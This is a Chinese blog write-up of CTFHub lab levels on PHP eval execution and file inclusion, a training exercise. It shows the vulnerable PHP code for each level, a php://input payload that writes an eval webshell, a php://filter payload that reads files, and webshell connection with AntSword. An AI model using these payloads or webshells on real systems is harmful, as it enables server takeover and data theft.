CTFHUB——RCE之eval执行和文件包含漏洞

最新推荐文章于 2024-05-09 21:11:54 发布
最新推荐文章于 2024-05-09 21:11:54 发布
阅读量5.1k 收藏 18
点赞数 2
分类专栏: 网络安全 文件包含漏洞 CTFHUB 文章标签: php 安全 linux web安全 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46467017/article/details/126634136
版权

CTFHUB——RCE之eval执行和文件包含漏洞

eval执行

本关代码如图所示
在这里插入图片描述

 <?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

代码解释为如果存在cmd参数,那就用eval函数执行cmd参数中的代码,所以本关存在命令执行。
通过ls命令查看当前目录文件,只有一个index.php文件
在这里插入图片描述
所以通过ls /命令查看所有目录
在这里插入图片描述
成功发现flag文件,通过cat命令进行查看
在这里插入图片描述

文件包含

在学习本关时,如果对文件包含漏洞不是很了解,可以查看我的这篇文章,里面详细讲解了文件包含漏洞。
文件包含漏洞全面详解
进入本关后代码如图所示。
在这里插入图片描述

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>
<hr>
i have a <a href="shell.txt">shell</a>, how to use it ?

这里有一个strpos(string,find,start)函数
意思在string字符串中找find的位置,start是查找的开始位置
那么这句代码的意思就是如果file中没有flag字符串就执行下面的include $_GET[“file”]
否则就输出Hacker。

通过下方的英文得知,本关存在一个shell.txt,点击蓝色的shell,就会跳转到shell.txt界面
在这里插入图片描述
发现里面写的是常见的一句话木马文件,因为这里存在include函数,所以这里我们有两种获取flag的方法。

方法1:直接通过post发包进行命令执行
将ctfhub传的参数用php执行

在这里插入图片描述
成功获取当前目录
接下来步骤就和上一关一样,只不过将命令通过post传参进行命令执行。

查看当前所有目录,发现flag文件
在这里插入图片描述
通过cat命令查看flag文件
在这里插入图片描述
方法2:通过webshell工具直接连接shell.txt文件
这里我通过蚁剑直接连接shell.txt文件
在这里插入图片描述
注意:连接前记得把本地代理关闭,要不可能无法正常连接。
添加后改成进入后台。
在这里插入图片描述
右键打开终端命令
在这里插入图片描述
进入终端后,输入命令和之前命令一样,成功获取flag
在这里插入图片描述

php://input

进入本关后代码如图所示
在这里插入图片描述

<?php
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 6) === "php://" ) {
        include($_GET["file"]);
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>
<hr>
i don't have shell, how to get flag? <br>
<a href="phpinfo.php">phpinfo</a>

代码意思为:通过使用substr函数对file参数的前5个字符进行判断,如果等于php://才会执行include函数。

所以本关要求我们使用伪协议,我们可以通过伪协议php://input进行执行php代码。还是有两种方法可以获取flag。

方法1:直接在浏览器上通过post参数进行命令执行。
查询当前目录
在这里插入图片描述
查询所有目录,发现flag文件
在这里插入图片描述
通过cat命令获取flag
在这里插入图片描述
方法2:可以通过php://input伪协议写入一句话木马,然后通过蚁剑连接获取flag。
写入代码如下,建议用burpsuit抓包通过repeater模块进行写入,这样可以更直观的知道一句话木马是否写入成功。

<?php fwrite(fopen("shell.php","w"),'<?php eval($_POST[123]);?>');?>

在这里插入图片描述
通过蚁剑进行连接
在这里插入图片描述
连接成功后,其余步骤与上一关相同。进入终端输入命令查询flag。
在这里插入图片描述
在这里插入图片描述

远程包含

进入本关后代码如下
在这里插入图片描述

<?php
error_reporting(0);
if (isset($_GET['file'])) {
    if (!strpos($_GET["file"], "flag")) {
        include $_GET["file"];
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>
<hr>
i don't have shell, how to get flag?<br>
<a href="phpinfo.php">phpinfo</a>

代码解释:本关代码和第一关文件包含一样,通过strpos函数判断参数是否存在flag字符,存在就执行include函数。因为本关没有限制php://input伪协议,所以本关解法和上一关一样,这里就不再赘述了。

flag如下
在这里插入图片描述

读取源代码

本关代码如下:
在这里插入图片描述

<?php
error_reporting(E_ALL);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 6) === "php://" ) {
        include($_GET["file"]);
    } else {
        echo "Hacker!!!";
    }
} else {
    highlight_file(__FILE__);
}
?>
<hr>
i don't have shell, how to get flag? <br>
flag in <code>/flag</code>

代码解释:本关代码和之前php://input关卡一样,通过substr函数来判断file参数是否等于php://,如果等于就执行include函数。

本关题目为读取源代码,所以本关我们需要使用php伪协议中的filter读取源代码。
payload为:

php://filter/convert.base64-encode/resource=/flag

成功获取到flag的base64编码
在这里插入图片描述
解码后成功获取flag
在这里插入图片描述

当然本关没有什么限制,如果直接读取的话也是可以成功读取出flag的。
在这里插入图片描述

caker丶
关注
  • 2
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB 文件上传漏洞
qq_75120258的博客
02-04 846
定义:文件上传漏洞web系统中常见的一种功能,通过文件上传能实现上传图片、视频,以及其他类型的文件,但是随着web中包含的功能越来越多,潜在的网络安全风险也就越大。如果恶意用户上传了可执行的文件或者脚本,就会导致网站被其控制甚至会使其服务器沦陷,以至于引发恶意的网络安全事件。一般是因为站点开放了文件上传功能,但却对上传的文件没有进行足够的限制。程序开发部署时,没有考虑到系统特性、过滤不严格。站点服务器存在解析漏洞,被黑客利用后导致可以上传任意文件。
CTFHub笔记之技能树RCEeval执行文件包含、远程包含、php://input、读取源代码
weixin_48799157的博客
03-28 4498
小白一个,如有错误请指正! 一、eval执行 ?cmd=system("ls"); ?cmd=system("ls%20/"); ?cmd=system("cat%20/flag_26396");
CTFHUB-技能树-Web题-RCE(远程代码执行)-eval执行
最新发布
Static______的博客
05-09 400
CTFHUB-技能树-Web题-RCE(远程代码执行
CTF命令执行RCE
qq_53099119的博客
04-02 2603
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
CTFHub技能树笔记之RCE命令注入、过滤cat、过滤空格
weixin_48799157的博客
03-28 8419
小白一个,记录解题过程,如有错误请指正! 一、命令注入 补充知识点: 命令行注入漏洞是指web应用程序中调用了系统可执行命令的函数,而且输入参数是可控的,如果黑客拼接了注入命令,就可以进行非法操作了。 Windows系统支持的管道符如下: 1. “|”:直接执行后面的语句。 2. “||”:如果前面的语句执行失败,则执行后面的语句,前面的语句只能为假才行。 3. “&”:两条命令执行,如果前面的语句为假则直接执行后面的语句,前面的语句可真可假。 4. “&&...
RCE漏洞基础及CTF绕过
qq_61988806的博客
12-15 487
对于两个二进制位,如果相应位相同则结果为 0,如果相应位不同则结果为 1。
题解记录-CTFHub技能树|Web|RCE
weixin_57448435的博客
09-15 792
RCE漏洞,Hackbar插件的使用,cmd命令,运算符、空格、关键字flag、cat。
ctf+任意命令执行RCE+常见系统命令+web安全
10-08
ctf+RCE+常见系统命令+web安全
通达OA任意文件上传配合文件包含导致的RCE.md
04-12
通达OA任意文件上传配合文件包含导致的RCE
Apache-Tomcat从文件包含RCE漏洞原理深入分析1
08-03
1. 下载相应的Tomcat版本源码和可执行文件。 2. 创建或修改pom.xml文件,以便编译源码。 3. 配置和启动Tomcat服务器。 4. 使用工具或编写恶意请求,尝试包含并执行服务器上的敏感文件。 5. 分析服务器日志和响应,...
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 的复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
CTFHub-Web-RCE-eval执行题目解析
weixin_46168073的博客
11-15 1315
一、启动场景 点击web 点击RCE 点击eval执行。 开启题目,启动场景。注册会送1000个币,做一个题目消耗30,做完奖励100还是50,总之完全不用担心币的问题。 启动之后会出现一个链接,我们点击。 二、解题过程 这里会出现PHP代码。 我们使用蚁剑 。(安装之类的我会单独写一篇文章) 右键--->添加数据。 把URL复制到蚁剑,密码cmd 然后点击添加。 可以看到我们添加数据成功。 双击进...
eval-Bugku CTF
m0_56859693的博客
09-05 1406
今天在bugku刷到了一道基础题,感觉考察的很全面。 源代码如下 第一行 include是将flag.php包含在页面代码中,也不难推测flag在flag.php中 第二行 $_REQUEST可以将用户传入的hello传给服务器 第三行分两个部分:eval和var_dump var_dump即把输入的hello作为字符串string输出 eval则可以把字符串当作php代码执行 把hello赋值为system("ls") 发现包含flag.php和index.php ...
萌新小白对于ctf学习的笔记--CTF中的RCE
黑战士的博客
03-08 1159
以上就是我对于RCE学习的一个总结,其中也借鉴了很多网上大佬们的文章,也有视频学习的笔记。如果有不足,会很快改的。
CTFHUB文件包含
2201_75447904的博客
04-04 623
但需要注意的是,由于安全原因,大多数浏览器对file://协议有一些限制,例如不允许跨域访问、限制JavaScript执行等,以防止恶意网站利用file://协议进行攻击。而include_once(),require_once()这两个函数,与前两个的不同之处在于这两个函数只包含一次,适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下,你想确保它只被包括一次以避免函数重定义,变量重新赋值等问题。: 如果GET参数'file'以"php://"开头,则直接包含用户指定的文件。
菜刀php木马_菜刀php过waf
weixin_34098846的博客
03-09 758
关于PHP一、waf为啥会拦截菜刀。菜刀在连接时,会向server端POST数据,抓包查看:会看到他向server端post了 @eval(base64_decode($_POST[z0])); 一般的waf都会拦截eval的。二、要想菜刀仍然正常工作,就必须让菜刀中的内置的@eval(base64_decode($_POST[z0]));代码不被waf拦截,但又可以传递到server端。方案一:...
CTF_WEB学习-------------RCE命令注入
qq_45616570的博客
07-14 2891
CTF_WEB学习-------------RCE命令注入 REC 什么是RCE? ​ 远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。RCE分为远程执行命令执行ping命令)和远程代码执行evalRCE产生的原因? ​ 漏洞的起源是在开发的过程中带有输入-执行功能的系统时,由于输入过滤不严谨,导致的命令产生了注入。 RCE漏洞分类 命令注入 文件包含 eval执行 命令注入 什么是命令注入? ​ 命令注入就是通过控
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。这样的技能在网络安全领域特别重要。 请注意,RCE是一种违法行为,在未经授权的情况下进行RCE攻击是被禁止的。在学习过程中,请遵循合法和道德准则,并严禁将所学技术用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值